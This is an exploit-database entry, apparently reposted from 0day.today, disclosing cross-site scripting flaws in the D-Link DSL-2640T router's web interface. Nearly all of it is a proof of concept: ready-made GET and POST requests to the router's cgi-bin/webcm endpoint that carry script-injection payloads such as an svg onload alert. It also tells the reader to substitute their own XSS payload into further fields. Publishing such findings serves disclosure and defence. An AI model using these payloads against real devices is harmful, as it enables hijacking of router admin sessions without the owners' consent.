id: 31322
date: 10/12/2018
title: D-Link DSL-2640T Cross Site Scripting Vulnerability
author: Anas Falhi
cves: 

# Exploit Title: Multiple XSS Vulnerabilities in D-Link DSL-2640T
# Exploit Author: Anas Falhi/m0ti0nl3ss ,https://anasfalhi.blogspot.com.
# Tested on: D-Link DSL-2640T
# Tags: xss, cross site scripting, D-Link DSL-2640T router
POC:

a!XSS via GET
  URL:
http://192.168.1.1:5050/cgi-bin/webcm?getpage=../html/home/home_RelaodHref.htm&var:RelaodHref=
"-alert(1)-"
----------------------------------------------------------------------------------------------------------------------------------------------------------------
a!XSS via POST
  URL: http://192.168.1.1:5050/cgi-bin/webcm

  Post Data: getpage=..%2fhtml%2fhome%2fwanPPP.htm&var%3aconid="><svg/

onload=alert(1)>&var%3amycon=yyyy&var%3apreForm=bbbb&var%3acontype=vvvv&var%3acontypeReal=

Note: Replace: yyyy, bbbb, vvvv with your XSS payload

#  0day.today [2023-03-22]  #